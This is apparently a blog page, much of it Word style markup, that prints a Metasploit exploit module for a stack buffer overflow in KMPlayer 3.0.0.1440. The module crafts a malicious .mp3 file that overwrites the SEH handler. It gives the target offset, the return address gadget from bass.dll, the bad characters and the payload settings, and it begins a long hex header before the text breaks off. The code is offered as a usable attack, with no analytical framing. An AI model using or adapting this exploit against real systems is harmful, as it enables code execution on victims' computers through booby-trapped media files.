UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">require 'msf/core'</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">class Metasploit3 < Msf::Exploit::Remote</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span><span style="mso-spacerun: yes;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>include Msf::Exploit::FILEFORMAT</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>include Msf::Exploit::Seh</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>def initialize(info = {})</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>super(update_info(info,</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Name'<span style="mso-spacerun: yes;"> </span>=> 'The KMPlayer 3.0.0.1440 .mp3 SEH exploit module',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Description'<span style="mso-spacerun: yes;"> </span>=> %q{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>This module exploits a stack buffer overflow in The <span style="mso-spacerun: yes;"> </span>KMPlayer 3.0.0.1440.When opening a specially crafted MP3 file (.mp3) in the application, SEH handler will be overwrite.<span style="mso-spacerun: yes;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>},</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Author'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>'AMol Naik'<span style="mso-spacerun: yes;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Version'<span style="mso-spacerun: yes;"> </span>=> 'Version 1.0',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 2;"> </span>'References'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 1;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 1;"> </span><span style="mso-tab-count: 1;"> </span>["URL", "http://www.exploit-db.com/exploits/17383"],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>["URL", "http://www.exploit-db.com/exploits/17364"],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 1;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'DefaultOptions' =></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>'EXITFUNC' => 'process',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>},</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Payload'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Space'<span style="mso-spacerun: yes;"> </span>=> 5000,<span style="mso-spacerun: yes;"> </span>#could be more, but this is enough</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'DisableNops' =><span style="mso-spacerun: yes;"> </span>'True',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'BadChars'<span style="mso-spacerun: yes;"> </span>=> "\x00\x0a\x0d",</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>},</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Platform' => 'win',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Targets'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>'Windows XP SP3 English VMware',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span><span style="mso-tab-count: 1;"> </span>'Offset' => 3314,</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>'Ret'<span style="mso-spacerun: yes;"> </span>=> 0x1101dd36,<span style="mso-spacerun: yes;"> </span># pop esi # pop ebx # ret 10 - bass.dll</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>}</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Privileged'<span style="mso-spacerun: yes;"> </span>=> false,</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'DefaultTarget'<span style="mso-spacerun: yes;"> </span>=> 0))</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>register_options(</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>OptString.new('FILENAME', [ true, 'mp3 file',<span style="mso-spacerun: yes;"> </span>'msf.mp3']),</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span><span style="mso-tab-count: 1;"> </span>], self.class)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>end</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>def exploit</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>print_status("Creating '#{datastore['FILENAME']}' file ...")</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>header = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\